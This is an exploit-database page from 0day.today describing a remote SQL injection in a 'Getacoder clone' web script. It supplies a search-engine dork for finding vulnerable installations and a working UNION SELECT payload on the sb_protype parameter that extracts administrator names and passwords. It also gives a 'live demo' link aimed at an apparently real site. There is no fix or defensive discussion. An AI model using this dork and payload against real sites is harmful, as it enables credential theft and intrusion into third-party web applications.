[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Getacoder clone (sb_protype) Remote SQL Injection Vulnerability

Author
Hussin X
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-3458
Category
web applications
Date add
26-07-2008
Platform
unsorted
===============================================================
Getacoder clone (sb_protype) Remote SQL Injection Vulnerability
===============================================================



|___________________________________________________|
|
| Getacoder Clone Script (sb_protype) Remote SQL Injection Vulnerability
|
|
|___________________________________________________
|                                                   |
|
| DorK   : inurl:"search_form.php?sb_showresult="
|___________________________________________________|



Exploit:  

www.[target].com/Script/search_form.php?sb_showresult=1&sb_protype=-2+UNION+SELECT+1,concat_ws(0x3a,sb_admin_name,sb_pwd),3+from+sbprj_admin--

 

L!VE DEMO: :


http://www.demosgreatclone.com/getacoder/search_form.php?sb_showresult=1&sb_protype=-2+UNION+SELECT+1,concat_ws(0x3a,sb_admin_name,sb_pwd),3+from+sbprj_admin--





#  0day.today [2024-12-26]  #